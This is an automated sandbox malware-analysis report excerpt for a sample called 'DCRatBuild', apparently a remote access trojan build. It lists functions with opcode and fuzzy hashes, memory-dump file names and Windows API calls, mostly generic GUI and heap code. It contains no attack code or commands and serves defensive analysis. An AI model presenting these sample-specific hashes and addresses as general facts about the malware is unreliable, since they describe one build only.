                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                      • Instruction ID: 1e561dbafe7d568d588f799c92c1f2332051568632527608a8de31fc2cda647d
                      • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                      • Instruction Fuzzy Hash: 6B9159702047498BDB24EF68C891BBA73D5EB90300F14892DE5DB97282FB75E644E772
                      Function 00D84969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0604bb4a8f23f926a160cfd35d382adfc379e015f8e01dbb5384d125c457e20a
                      • Instruction ID: 761e992651c9bad772a5712114f4be5ee57024c388b36501b70b26f783e20a33
                      • Opcode Fuzzy Hash: 0604bb4a8f23f926a160cfd35d382adfc379e015f8e01dbb5384d125c457e20a
                      • Instruction Fuzzy Hash: 19617B7168070B66DE3CBB689955BBF3388EB41708F1C0A1EE482DF281D651ED41CB79
                      Function 00D73D6D Relevance: .2, Instructions: 232COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                      • Instruction ID: 7b4effc43ac90b89148bca7c8673c8f967c71b35b345baa5445a8e0991a57db8
                      • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                      • Instruction Fuzzy Hash: 307109716043454BDB24DE2CC8D1BAD77E5EF90304F14892DF5CE8B282EA74DA85A772
                      Function 00D8473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                      • Instruction ID: ea84340925cbfda5f83fcf2874f3ef76a9d02cc8e21e1ec425dcf65d9c2b37e5
                      • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                      • Instruction Fuzzy Hash: D6514670600A8757DB38BA688C96BBF67E9DF53740F1C050AE982D7282D715DD4183F6
                      Function 00D6DE6C Relevance: .2, Instructions: 190COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d65a23461cae5fff06dcc849696fd1175a4bcb9e605ce029d233f7147406de8
                      • Instruction ID: 55827935485201de1601623e6c863c2038d2f6e59799cce5b59b0d4990b68021
                      • Opcode Fuzzy Hash: 5d65a23461cae5fff06dcc849696fd1175a4bcb9e605ce029d233f7147406de8
                      • Instruction Fuzzy Hash: D1816B8261A7E49ECB168F7D3CA42B63FA15733340B1D04AAD4C6C63A7C5768A5CD732
                      Function 00D6E8A0 Relevance: .2, Instructions: 154COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bd10b8fc9c2f00d492befa88c85af2b4b551af793686b60ebea4a6c9efc4ff98
                      • Instruction ID: f8f6ebeff83f92489f511fd59f549a923aaf2d37bd0de760ca642ae1e870f9d2
                      • Opcode Fuzzy Hash: bd10b8fc9c2f00d492befa88c85af2b4b551af793686b60ebea4a6c9efc4ff98
                      • Instruction Fuzzy Hash: 0751BD399093D54FC712CF28918446EBFE1BEDA314F4949AEE4D54B202D2219A4ACBB2
                      Function 00D6F968 Relevance: .1, Instructions: 131COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1227bc1bff9f3f868f5cc2cc592a9f0ffdd4088815146ff8d75b2722076a08d
                      • Instruction ID: f994ac7a3ee8c088cea3d86e93a97271e4516de0f6fcae3a0ab95eb7f3b5a73e
                      • Opcode Fuzzy Hash: c1227bc1bff9f3f868f5cc2cc592a9f0ffdd4088815146ff8d75b2722076a08d
                      • Instruction Fuzzy Hash: 4C512671A087018BC748CF19E48059AF7E1FF88354F058A2EE899A7740DB34E959CB9A
                      Function 00D737C1 Relevance: .1, Instructions: 112COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                      • Instruction ID: ae16ce1cd614ca71722769187c7ade3dcf0d25caa28933dd137fb35797abfe8c
                      • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                      • Instruction Fuzzy Hash: 4D31D6B26147468FCB14DF28C85126ABBE0FB95300F14892DE4D9D7742D735EA4ACBB2
                      Function 00D65F3C Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f674de958fe111ea427ecd683d52feb57c3047b0d6d51059acc2d6b73229c9f1
                      • Instruction ID: 02df76f528a1aa2d6afbef9a676f342bbc11b593aaf4349d6a992191c5eb7894
                      • Opcode Fuzzy Hash: f674de958fe111ea427ecd683d52feb57c3047b0d6d51059acc2d6b73229c9f1
                      • Instruction Fuzzy Hash: B3218A72A202654BCB48CF2EEC904767751AB8631174A812BFA46CB3D5C535ED65C7B0
                      Function 00D6DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                      Download Yara Rule
                      APIs
                      • _swprintf.LIBCMT ref: 00D6DABE
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                        • Part of subcall function 00D71596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00DA0EE8,00000200,00D6D202,00000000,?,00000050,00DA0EE8), ref: 00D715B3
                      • _strlen.LIBCMT ref: 00D6DADF
                      • SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                      • GetWindowRect.USER32(?,?), ref: 00D6DB79
                      • GetClientRect.USER32(?,?), ref: 00D6DB85
                      • GetWindowLongW.USER32(?,000000F0), ref: 00D6DC25
                      • GetWindowRect.USER32(?,?), ref: 00D6DC52
                      • SetWindowTextW.USER32(?,?), ref: 00D6DC95
                      • GetSystemMetrics.USER32(00000008), ref: 00D6DC9D
                      • GetWindow.USER32(?,00000005), ref: 00D6DCA8
                      • GetWindowRect.USER32(00000000,?), ref: 00D6DCD5
                      • GetWindow.USER32(00000000,00000002), ref: 00D6DD47
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                      • String ID: $%s:$CAPTION$d
                      • API String ID: 2407758923-2512411981
                      • Opcode ID: 8b21302bb02159ccbd6612d4bd2af0c9393a97de68dbff7ece549c10171c793a
                      • Instruction ID: 4721548384b083f58e088efcb7e420ab923a94d7c7a0a825584c6b57501b261a
                      • Opcode Fuzzy Hash: 8b21302bb02159ccbd6612d4bd2af0c9393a97de68dbff7ece549c10171c793a
                      • Instruction Fuzzy Hash: 9C819171608306AFD710DF68DD85F6BBBE9EB88704F09091DFA85D7250D670E909CB62
                      Function 00D8C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 00D8C277
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE2F
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE41
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE53
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE65
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE77
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE89
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BE9B
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEAD
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEBF
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BED1
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEE3
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BEF5
                        • Part of subcall function 00D8BE12: _free.LIBCMT ref: 00D8BF07
                      • _free.LIBCMT ref: 00D8C26C
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D8C28E
                      • _free.LIBCMT ref: 00D8C2A3
                      • _free.LIBCMT ref: 00D8C2AE
                      • _free.LIBCMT ref: 00D8C2D0
                      • _free.LIBCMT ref: 00D8C2E3
                      • _free.LIBCMT ref: 00D8C2F1
                      • _free.LIBCMT ref: 00D8C2FC
                      • _free.LIBCMT ref: 00D8C334
                      • _free.LIBCMT ref: 00D8C33B
                      • _free.LIBCMT ref: 00D8C358
                      • _free.LIBCMT ref: 00D8C370
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: d7769372de81343d0aa6d0594aa901b1b8a197f5eca0ffbc385a8e915c8053f7
                      • Instruction ID: 8a317ce0cc343ebf8d4d210481e155aa35474386f48f57fb16c1bf3e9d4bf8ce
                      • Opcode Fuzzy Hash: d7769372de81343d0aa6d0594aa901b1b8a197f5eca0ffbc385a8e915c8053f7
                      • Instruction Fuzzy Hash: FA315832600605DFEB21BB78D945B5A73EAFF00310F58942AF449D7691DF31AC81AB74
                      Function 00D7CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindow.USER32(?,00000005), ref: 00D7CD51
                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00D7CD7D
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00D7CD99
                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D7CDB0
                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7CDC4
                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D7CDED
                      • DeleteObject.GDI32(00000000), ref: 00D7CDF4
                      • GetWindow.USER32(00000000,00000002), ref: 00D7CDFD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                      • String ID: STATIC
                      • API String ID: 3820355801-1882779555
                      • Opcode ID: a38013cb2fee21c0e9bcb3944225ec091f54e87a0246c263211a8debb075d868
                      • Instruction ID: d6edc0a78f94bc6264680fa63eeeecf9e42ba56e179b1774dc59632013e35e78
                      • Opcode Fuzzy Hash: a38013cb2fee21c0e9bcb3944225ec091f54e87a0246c263211a8debb075d868
                      • Instruction Fuzzy Hash: A6113633140712BFE3306B609C0AFAF765CFF44751F04D025FA4AE1192FA60890696B0
                      Function 00D88EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D88EC5
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D88ED1
                      • _free.LIBCMT ref: 00D88EDC
                      • _free.LIBCMT ref: 00D88EE7
                      • _free.LIBCMT ref: 00D88EF2
                      • _free.LIBCMT ref: 00D88EFD
                      • _free.LIBCMT ref: 00D88F08
                      • _free.LIBCMT ref: 00D88F13
                      • _free.LIBCMT ref: 00D88F1E
                      • _free.LIBCMT ref: 00D88F2C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 621770fe92def757de736928e3ccf7dc3ff962ebf6ef0c952ccd80a903dfc15f
                      • Instruction ID: 44000b89cc464163c70a96124b1fa69b8e113c87f7f6097de90fe9f35e21d619
                      • Opcode Fuzzy Hash: 621770fe92def757de736928e3ccf7dc3ff962ebf6ef0c952ccd80a903dfc15f
                      • Instruction Fuzzy Hash: 8811867651010DBFCB11FF58D942CDA3BA6FF04350B9141A5FA088F666DA32EE51EBA0
                      Function 00D62162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: ;%u$x%u$xc%u
                      • API String ID: 0-2277559157
                      • Opcode ID: 9992cd8c686fb07358685a2b304910dac06918e1eb43cc5294da772fc3d5303d
                      • Instruction ID: c13431a16a2f0fdef1ae0c21e5bc226a113a6a67995432dc6a42de18e928751b
                      • Opcode Fuzzy Hash: 9992cd8c686fb07358685a2b304910dac06918e1eb43cc5294da772fc3d5303d
                      • Instruction Fuzzy Hash: 02F125716087805BDB25EF78C895BFE7799AF94300F0C4469F886CB293DB249948C7B6
                      Function 00D7ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7AD20
                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D7AD47
                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D7AD60
                      • SetWindowTextW.USER32(?,?), ref: 00D7AD71
                      • GetDlgItem.USER32(?,00000065), ref: 00D7AD7A
                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D7AD8E
                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D7ADA4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: MessageSend$Item$TextWindow$Dialog
                      • String ID: LICENSEDLG
                      • API String ID: 3214253823-2177901306
                      • Opcode ID: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                      • Instruction ID: 12b61c3378df4f9961a679d4c158f9cb0c5c93a7478961a39c82a3bdc1bf2ac3
                      • Opcode Fuzzy Hash: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                      • Instruction Fuzzy Hash: 7921D632244306BBD2315F69EC49E7F3F6CFB8AB46F054015F609D26A0FB519901E632
                      Function 00D69443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D69448
                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D6946B
                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D6948A
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      • _swprintf.LIBCMT ref: 00D69526
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • MoveFileW.KERNEL32(?,?), ref: 00D69595
                      • MoveFileW.KERNEL32(?,?), ref: 00D695D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
